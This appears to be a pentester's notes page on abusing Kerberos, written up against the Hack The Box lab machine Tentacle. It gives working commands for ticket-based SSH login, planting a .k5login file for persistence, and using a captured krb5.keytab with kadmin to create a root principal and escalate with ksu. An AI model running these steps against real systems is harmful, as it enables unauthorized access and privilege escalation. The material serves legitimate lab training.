Authentication method gssapi-with-mic (krb5.conf file)
If we receive the following message while trying to authenticate with any service:
1
2
3
4
5
debug1: SSH2_MSG_EXT_INFO received
debug1: kex_input_ext_info: server-sig-algs=<ssh-ed25519,ssh-rsa,rsa-sha2-256,rsa-sha2-512,ssh-dss,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521>
debug1: SSH2_MSG_SERVICE_ACCEPT received
debug1: Authentications that can continue: gssapi-keyex,gssapi-with-mic,password
debug1: Next authentication method: gssapi-with-mic
This means that kerberos is running for the authentication of such services, to abuse of such configuration we need to install krb5-conf, it will create an environment on our machine that will allow kali to run as a kerberos client:
1
apt-get install krb5-user
Once that we receive a prompt asking for a domain we enter the realcorp.htb domain: ![[Pasted image 20230123134328.png]] Then add the machine’s IP twice: ![[Pasted image 20230123134422.png]] The installation creates a fille called /etc/krb5.conf which we’ll modify as follows:
1
2
3
4
5
6
7
8
9
[libdefaults]
default_realm = REALCORP.HTB
[realms]
REALCORP.HTB = {
kdc = srv01.realcorp.htb:88
}
[domain_realm]
.realcorp.htb = REALCORP.HTB
realcorp.htb = REALCORP.HTB
Then in order to connect to the SSH port we can use the following command which will ask for the password:
1
2
kinit j.nakazawa
Password for j.nakazawa@REALCORP.HTB:
After submit the password we’ll find that there is a register with this same password created:
1
2
3
4
5
6
klist
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: j.nakazawa@REALCORP.HTB
Valid starting Expires Service principal
01/23/2023 15:10:38 01/24/2023 15:10:38 krbtgt/REALCORP.HTB@REALCORP.HTB
This should allow us to login without password via ssh:
1
2
ssh j.nakazawa@10.10.10.224
j.nakazawa@10.10.10.224's password:
If still not possible to login via SSH then we need to sync the DC time with our machine:
1
2
3
ntpdate 10.10.10.224
2023-01-23 15:13:01.504643 (-0500) +1.004272 +/- 0.038425 10.10.10.224 s10 no-leap
CLOCK: time stepped by 1.004272
Then we’ll be able to login:
1
2
3
4
5
6
7
8
ssh j.nakazawa@10.10.10.224
Activate the web console with: systemctl enable --now cockpit.socket
Last failed login: Mon Jan 23 20:05:55 GMT 2023 from 10.10.14.2 on ssh:notty
There were 11 failed login attempts since the last successful login.
Last login: Thu Dec 24 06:02:06 2020 from 10.10.14.2
[j.nakazawa@srv01 ~]$ whoami
j.nakazawa
Notice that if we want to login to a specific machine via hostname, the
/etc/hostsfile needs to has the hostname of the machine at the very beginning.
Examples: Tentacle
.k5login file
If we can create a .k5login file inside the /home of a user we can login with it always that we already have a Principal created with the krb-user tool, all we need to do is execute the following command:
1
echo 'j.nakazawa@REALCORP.HTB' > .k5login
Examples: Tentacle
Abusing krb5.keytab
If we get a krb5.keytab file we can abuse of it to list, create and login Service Name Principals:
1
2
3
4
5
6
7
8
9
10
klist -k /etc/krb5.keytab # list all the Principals
kadmin -kt /etc/krb5.keytab -p kadmin/admin@REALCORP.HTB # Interactive shell as Principal kadmin/admin this needs to be a Principal from klist
kadmin: addprinc root@REALCORP.HTB # Create a Principal (password required)
Enter password for principal "root@REALCORP.HTB":
Re-enter password for principal "root@REALCORP.HTB":
Principal "root@REALCORP.HTB" created.
ksu
WARNING: Your password may be exposed if you enter it here and are logged in remotely using an unsecure (non-encrypted) channel.
Kerberos password for root@REALCORP.HTB: :
Authenticated root@REALCORP.HTB
Finally we can use it to login the machine: Examples: Tentacle